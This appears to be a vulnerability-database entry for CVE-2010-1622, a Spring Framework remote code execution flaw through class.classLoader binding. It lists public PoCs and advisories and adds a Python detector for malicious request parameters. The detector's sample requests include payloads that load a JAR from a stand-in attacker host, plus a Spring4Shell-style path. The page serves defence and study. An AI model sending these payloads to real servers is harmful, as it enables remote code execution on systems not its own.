CVE-2010-1622

LAB

Spring Framework 2.5.x < 2.5.6.SEC02, 2.5.7 < 2.5.7.SR01, 3.0.x < 3.0.3 - Code Injection via class.classLoader property binding (also shipped in Oracle Fusion Middleware)

Title source: rule
STIX 2.1

Exploitation Summary

EIP tracks 5 public exploits for CVE-2010-1622. PoCs published by Meder Kydyraliev, DDuarte, E-bounce.

AI-analyzed exploit summary: The writeup describes CVE-2010-1622, a critical vulnerability in the Spring Framework that allows arbitrary code execution by manipulating the web application class loader's URL list through a nested HTTP parameter (class.classLoader.URLs[0]=jar:...). It outlines the attack steps, including crafting a malicious JAR and submitting a specially crafted HTTP request to exploit the vulnerability.

Description

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.
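The description above is the whole binding pattern: Spring's bean-property binder resolves a nested path like class.classLoader.URLs[0], and the attacker supplies a jar: URL as the value. A request-side detector for that pattern, as an added example written for this page (not code from the advisory, from Spring, or from any of the exploit repositories listed below): it URL-decodes query and form parameters, splits each parameter name into property-path segments, and flags any contiguous run of segments that walks from java.lang.Class to a ClassLoader. The class.module.classLoader sequence is included because CVE-2022-22965, which appears among the PoCs below, is the JDK 9+ bypass of this CVE's fix. The sample requests and the host 198.51.100.7 are constructed, not captured traffic.

```python
"""Flag Spring property-path binding abuse in HTTP request parameters.

Added example for this page; not code from the original advisory, Spring, or
any of the exploit repositories listed here. Sample requests are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Segment sequences that reach a ClassLoader through Spring's nested property
# binding. "class" is Object.getClass(); "module" is the JDK 9+ Class.getModule()
# hop that CVE-2022-22965 used once the direct class.classLoader path was blocked.
# Spring's CVE-2010-1622 fix stopped exposing both classLoader and
# protectionDomain on java.lang.Class.
DANGEROUS_SEQUENCES = (
    ("class", "classloader"),
    ("class", "module", "classloader"),
    ("class", "protectiondomain"),
)

# One property-path segment: anything between dots or index brackets.
SEGMENT_RE = re.compile(r"[^.\[\]]+")


def path_segments(param_name: str) -> list[str]:
    """'class.classLoader.URLs[0]' -> ['class', 'classloader', 'urls', '0'].

    Lower-casing is a defensive choice so leading-capital variants such as
    Class.classLoader are caught too."""
    return [s.lower() for s in SEGMENT_RE.findall(param_name)]


def is_dangerous_path(param_name: str) -> bool:
    """True if any contiguous run of segments reaches a ClassLoader.

    Nested command objects also have getClass(), so the run may start at any
    depth (e.g. address.class.classLoader.URLs[0])."""
    segs = path_segments(param_name)
    for seq in DANGEROUS_SEQUENCES:
        n = len(seq)
        if any(tuple(segs[i:i + n]) == seq for i in range(len(segs) - n + 1)):
            return True
    return False


def scan_params(params):
    """params: iterable of already URL-decoded (name, value) pairs."""
    findings = []
    for name, value in params:
        if not is_dangerous_path(name):
            continue
        reason = "parameter name binds through java.lang.Class to a ClassLoader"
        if value.lower().startswith("jar:"):
            reason += "; value is a jar: URL (CVE-2010-1622 remote JAR load)"
        findings.append({"param": name, "value": value, "reason": reason})
    return findings


def scan_request(method: str, target: str, body: str = ""):
    """Inspect query-string parameters and, for POST, a form-encoded body."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if method.upper() == "POST" and body:
        params += parse_qsl(body, keep_blank_values=True)
    return scan_params(params)


# Constructed sample traffic (not captured data). 198.51.100.7 is a
# documentation-range address standing in for an attacker-controlled host.
SAMPLE_REQUESTS = [
    ("GET", "/app/account?name=alice&address.city=Bern", ""),
    ("GET", "/app/account?class.classLoader.URLs%5B0%5D=jar:http://198.51.100.7/evil.jar!/", ""),
    ("POST", "/app/account", "address.class.classLoader.URLs[0]=jar:http://198.51.100.7/evil.jar!/"),
    ("POST", "/app/account", "Class.module.classLoader.defaultAssertionStatus=true"),
]


def scan_all(requests=SAMPLE_REQUESTS):
    """Return [(method, target, findings), ...] for a batch of requests."""
    return [(m, t, scan_request(m, t, b)) for m, t, b in requests]


if __name__ == "__main__":
    for method, target, findings in scan_all():
        print(method, target, "->", findings or "clean")
```

Matching is case-insensitive so that leading-capital variants are caught; that leniency is a defensive choice of this detector rather than a statement about how each Spring version resolves property names. Run it over a proxy or WAF log by feeding each request's method, target and body to scan_request; a hit with a jar: value is the exact shape the description above gives for this CVE.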

Exploits (5)

exploitdb WRITEUP VERIFIED
by Meder Kydyraliev · text · webapps · multiple
https://www.exploit-db.com/exploits/13918

The exploit-db entry is Meder Kydyraliev's original advisory. It explains how Spring's bean-property binding exposes Object.getClass().getClassLoader(), so that a request parameter class.classLoader.URLs[0]=jar:<URL>!/ appends an attacker-hosted JAR to the web application's class loader, and it walks through building that JAR and sending the request. In the Tomcat demonstration the code runs when the container subsequently picks up a tag library shipped in the newly added JAR.

Classification
Writeup 90%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Spring Framework 3.0.0 to 3.0.2, 2.5.0 to 2.5.6.SEC01 (community), 2.5.0 to 2.5.7 (subscription)
No auth needed
Prerequisites: Access to a Spring application running on a vulnerable version · Ability to host a malicious JAR on an attacker-controlled server
devstral-2 · analyzed Feb 16, 2026
nomisec WORKING POC 19 stars
by DDuarte · poc
https://github.com/DDuarte/springshell-rce-poc

This repository contains a functional PoC for CVE-2022-22965 (Spring4Shell), the JDK 9+ bypass of the CVE-2010-1622 fix: with Class.getClassLoader() no longer bindable, the path class.module.classLoader reaches the same class loader. It includes a vulnerable Spring application and a Python script that exploits it by deploying a JSP webshell via malicious parameter binding. It does not exercise the 2010 class.classLoader.URLs path itself.

Classification
Working Poc 100%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Spring Framework (versions before 5.3.18 / 5.2.20)
No auth needed
Prerequisites: JDK 9 or above · Standalone Tomcat with WAR deployment · Writable file system (e.g., webapps/ROOT) · No WebDataBinder blocklist
devstral-2 · analyzed Feb 16, 2026
nomisec WORKING POC 2 stars
by E-bounce · poc
https://github.com/E-bounce/cve-2010-1622_learning_environment

This repository provides a Dockerized learning environment for CVE-2010-1622, the Spring Framework property-binding vulnerability, with the vulnerable Spring MVC application deployed on Apache Tomcat 6.0.26 (the container is the host for the demo, not the vulnerable component). It includes controllers that demonstrate the vulnerability, allowing users to interact with the environment to understand the exploit mechanics.

Classification
Working Poc 90%
Attack Type
Info Leak
Complexity
Moderate
Reliability
Reliable
Target: vulnerable Spring MVC application deployed on Apache Tomcat 6.0.26
No auth needed
Prerequisites: Docker · Java 8 · Maven
devstral-2 · analyzed Feb 18, 2026
nomisec STUB
by HandsomeCat00 · poc
https://github.com/HandsomeCat00/Spring-CVE-2010-1622

The repository contains minimal Spring MVC code demonstrating a basic controller and POJO but lacks any exploit code or technical details related to CVE-2010-1622. No vulnerability demonstration or analysis is present.

Classification
Stub 90%
Attack Type
Other
Complexity
Trivial
Reliability
Theoretical
Target: Spring Framework (unspecified version)
No auth needed
Prerequisites: None specified
devstral-2 · analyzed Feb 18, 2026

References (14)

Core References (14)
Third Party Advisory (VUPEN): http://www.vupen.com/english/advisories/2011/0237
Exploit (Exploit-DB): http://www.exploit-db.com/exploits/13918
Third Party Advisory (Secunia): http://secunia.com/advisories/43087
Exploit, Vendor Advisory (SpringSource): http://www.springsource.com/security/cve-2010-1622
Third Party Advisory (Secunia): http://secunia.com/advisories/41025
Vendor Advisory (Red Hat): http://www.redhat.com/support/errata/RHSA-2011-0175.html
Vendor Advisory (Apache Geronimo 2.2.x): http://geronimo.apache.org/22x-security-report.html
Third Party Advisory, VDB Entry (BID): http://www.securityfocus.com/bid/40954
Third Party Advisory (Secunia): http://secunia.com/advisories/41016
Third Party Advisory, VDB Entry (SecurityTracker): http://www.securitytracker.com/id/1033898
Vendor Advisory (Apache Geronimo 2.1.x): http://geronimo.apache.org/21x-security-report.html
Exploit, Mailing List (Bugtraq): http://www.securityfocus.com/archive/1/511877

Scores

EPSS 0.0155
EPSS Percentile 81.9%

Lab Environment

COMMUNITY
Community Lab
docker pull tomcat:8.5-jdk11-openjdk-slim-buster
docker pull ebounce/cve_2010_1622_learning_env:latest
+1 more repos

Details

CWE
CWE-94
Status published
Products (15)
oracle/fusion_middleware 7.6.2
oracle/fusion_middleware 11.1.1.6.1
oracle/fusion_middleware 11.1.1.8.0
org.springframework/spring 2.5.0 - 2.5.7 (Maven)
springsource/spring_framework 2.5.0
springsource/spring_framework 2.5.1
springsource/spring_framework 2.5.2
springsource/spring_framework 2.5.3
springsource/spring_framework 2.5.4
springsource/spring_framework 2.5.5
... and 5 more
Published Jun 21, 2010
Tracked Since Feb 18, 2026